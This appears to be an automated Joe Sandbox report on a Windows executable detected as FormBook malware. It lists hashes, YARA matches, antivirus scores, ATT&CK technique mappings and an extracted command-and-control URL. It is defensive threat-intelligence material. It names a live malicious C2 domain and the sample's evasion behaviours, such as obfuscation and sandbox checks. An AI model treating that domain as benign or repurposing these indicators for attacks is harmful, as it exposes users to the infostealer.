Windows Analysis Report
nSMFpXgLe7.exe

Overview

General Information

Sample Name: nSMFpXgLe7.exe
Original Sample Name: 0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48.exe
Analysis ID: 830331
MD5: 80b40bd25a0ad14166dbbe17215b678a
SHA1: 94f9b752785949d23585e66b497a8c446ab81ec0
SHA256: 0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48
Tags: exe, Formbook

Detection

FormBook
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses 32bit PE files
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Yara signature match
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • nSMFpXgLe7.exe (PID: 4968 cmdline: C:\Users\user\Desktop\nSMFpXgLe7.exe MD5: 80B40BD25A0AD14166DBBE17215B678A)
    • WerFault.exe (PID: 64 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"C2 list": ["www.carolinerosenstein.com/g44n/"]}
Source | Rule | Description | Author
nSMFpXgLe7.exe | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
nSMFpXgLe7.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
nSMFpXgLe7.exe | Windows_Trojan_Formbook_1112e116 | unknown | unknown
nSMFpXgLe7.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
nSMFpXgLe7.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group

Source | Rule | Description | Author
00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group

Source | Rule | Description | Author
0.0.nSMFpXgLe7.exe.1140000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0.0.nSMFpXgLe7.exe.1140000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.0.nSMFpXgLe7.exe.1140000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
0.0.nSMFpXgLe7.exe.1140000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0.0.nSMFpXgLe7.exe.1140000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group

              No Sigma rule has matched
              No Snort rule has matched

AV Detection

Source: nSMFpXgLe7.exe - Avira: detected
Source: nSMFpXgLe7.exe - ReversingLabs: Detection: 71%
Source: nSMFpXgLe7.exe - Virustotal: Detection: 66%
Source: Yara match - File source: nSMFpXgLe7.exe, type: SAMPLE
Source: Yara match - File source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match - File source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: www.carolinerosenstein.com/g44n/ - Avira URL Cloud: Label: malware
Source: nSMFpXgLe7.exe - Joe Sandbox ML: detected
Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp - Malware Configuration Extractor: FormBook {"C2 list": ["www.carolinerosenstein.com/g44n/"]}
Source: nSMFpXgLe7.exe - Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: nSMFpXgLe7.exe - Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: Malware configuration extractor - URLs: www.carolinerosenstein.com/g44n/
Source: Amcache.hve.3.dr - String found in binary or memory: http://upx.sf.net

E-Banking Fraud

Source: Yara match - File source: nSMFpXgLe7.exe, type: SAMPLE
Source: Yara match - File source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match - File source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

System Summary

Source: nSMFpXgLe7.exe, type: SAMPLE - Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: nSMFpXgLe7.exe, type: SAMPLE - Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: nSMFpXgLe7.exe, type: SAMPLE - Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: nSMFpXgLe7.exe PID: 4968, type: MEMORYSTR - Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: nSMFpXgLe7.exe - Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: nSMFpXgLe7.exe - Static PE information: No import functions for PE file found
Source: nSMFpXgLe7.exe, type: SAMPLE - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: nSMFpXgLe7.exe, type: SAMPLE - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: nSMFpXgLe7.exe, type: SAMPLE - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: nSMFpXgLe7.exe PID: 4968, type: MEMORYSTR - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011412B0
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0116236A
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_01161506
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_01161D39
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0114B457
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0114B452
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011444C7
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011444C0
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0114FE87
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011446E7
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011412B0 EntryPoint,LdrInitializeThunk,NtProtectVirtualMemory,KiUserExceptionDispatcher,0_2_011412B0
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011414E9 NtProtectVirtualMemory,KiUserExceptionDispatcher,0_2_011414E9
Source: nSMFpXgLe7.exe - Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nSMFpXgLe7.exe - Static PE information: Section .text
Source: nSMFpXgLe7.exe - ReversingLabs: Detection: 71%
Source: nSMFpXgLe7.exe - Virustotal: Detection: 66%
Source: nSMFpXgLe7.exe - Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown - Process created: C:\Users\user\Desktop\nSMFpXgLe7.exe C:\Users\user\Desktop\nSMFpXgLe7.exe
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208
Source: C:\Windows\SysWOW64\WerFault.exe - Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4968
Source: C:\Windows\SysWOW64\WerFault.exe - File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFB1.tmp
Source: classification engine - Classification label: mal96.troj.winEXE@2/6@0/0
Source: C:\Windows\SysWOW64\WerFault.exe - File read: C:\Windows\System32\drivers\etc\hosts
Source: nSMFpXgLe7.exe - Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_01161153 push eax; ret 0_2_01161159
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0114E9FC push es; retf 0_2_0114EA09
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0116109C push eax; ret 0_2_011610EF
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011610F2 push eax; ret 0_2_01161159
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011610E9 push eax; ret 0_2_011610EF
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0115A37A push esi; retf 0_2_0115A37C
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_01149BCE pushad ; iretd 0_2_01149BCF
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0115AA73 push es; iretd 0_2_0115AA75
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_01161442 push dword ptr [482F20F0h]; ret 0_2_0116148C
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_0115ACFE push cs; iretd 0_2_0115ACFF
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011627A5 push esp; ret 0_2_011627A9
Source: initial sample - Static PE information: section name: .text entropy: 7.324967441383678
Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: NOOPENFILEERRORBOX
Source: Amcache.hve.3.dr - Binary or memory string: VMware
Source: Amcache.hve.3.dr - Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.3.dr - Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.3.dr - Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr - Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.3.dr - Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr - Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.3.dr - Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr - Binary or memory string: VMware7,1
Source: Amcache.hve.3.dr - Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr - Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr - Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr - Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr - Binary or memory string: VMware, Inc.me
Source: Amcache.hve.3.dr - Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.3.dr - Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr - Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Process queried: DebugPort
Source: C:\Users\user\Desktop\nSMFpXgLe7.exe - Code function: 0_2_011412B0 EntryPoint,LdrInitializeThunk,NtProtectVirtualMemory,KiUserExceptionDispatcher,0_2_011412B0
Source: Amcache.hve.3.dr - Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information

Source: Yara match - File source: nSMFpXgLe7.exe, type: SAMPLE
Source: Yara match - File source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match - File source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match - File source: nSMFpXgLe7.exe, type: SAMPLE
Source: Yara match - File source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match - File source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | 1 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 Software Packing | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud

              Source | Detection | Scanner | Label | Link
              nSMFpXgLe7.exe | 72% | ReversingLabs | Win32.Trojan.FormBook |
              nSMFpXgLe7.exe | 67% | Virustotal | | Browse
              nSMFpXgLe7.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
              nSMFpXgLe7.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              Source | Detection | Scanner | Label | Link | Download
              0.0.nSMFpXgLe7.exe.1140000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              0.2.nSMFpXgLe7.exe.1140000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              www.carolinerosenstein.com/g44n/ | 0% | Virustotal | | Browse
              www.carolinerosenstein.com/g44n/ | 100% | Avira URL Cloud | malware |
              No contacted domains info
              Name | Malicious | Antivirus Detection | Reputation
              www.carolinerosenstein.com/g44n/ | true | 0%, Virustotal, Browse; Avira URL Cloud: malware | low
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://upx.sf.net | Amcache.hve.3.dr | false | | high
                No contacted IP infos
                Joe Sandbox Version:37.0.0 Beryl
                Analysis ID:830331
                Start date and time:2023-03-20 09:15:17 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:nSMFpXgLe7.exe
                Original Sample Name:0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48.exe
                Detection:MAL
                Classification:mal96.troj.winEXE@2/6@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 97.8% (good quality ratio 88.1%)
                • Quality average: 66.1%
                • Quality standard deviation: 33.4%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 2
                • Number of non-executed functions: 9
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                Time | Type | Description
                09:17:01 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.6245413242112693
                Encrypted:false
                SSDEEP:96:4TFWrORCuahkg7xf5pXIQcQvc6QcEDMcw3D7+HbHg6ZAXGng5FMTPSkvPkpXmTAj:yIr7LHBUZMX4jE/u7sWS274Its
                MD5:09B75D1DB01AFAA0B2D33F14EEB512E7
                SHA1:B6CEBEBC5838A5B1C5C6F97FFD443984A539F21F
                SHA-256:AA7AA80F064EBD02EB2F713006A74D8B45B4266FD18A21FB45977D166147FA17
                SHA-512:50610D814DCD922B1C7447F8D8B5C04F2B5848779D0D53265C4DE94756705FCD7FC0ABD95489D50A29D44A5CE32713638158AE4318DE93AA7A34125BC812F6A0
                Malicious:true
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.3.7.7.3.8.1.4.7.0.1.5.3.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.3.7.7.3.8.1.5.3.5.7.7.9.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.7.a.4.6.c.3.-.4.8.5.f.-.4.4.1.7.-.9.a.5.5.-.c.3.f.0.4.5.8.5.7.4.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.7.d.d.8.6.9.-.2.c.f.5.-.4.8.b.d.-.9.c.a.a.-.e.9.6.a.2.7.c.d.7.7.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.S.M.F.p.X.g.L.e.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.6.8.-.0.0.0.1.-.0.0.1.f.-.d.6.9.d.-.1.f.5.4.0.4.5.b.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.b.c.1.2.5.d.c.8.2.5.c.f.9.c.3.3.b.5.6.a.9.d.1.7.f.6.6.4.c.3.9.0.0.0.0.f.f.f.f.!.0.0.0.0.9.4.f.9.b.7.5.2.7.8.5.9.4.9.d.2.3.5.8.5.e.6.6.b.4.9.7.a.8.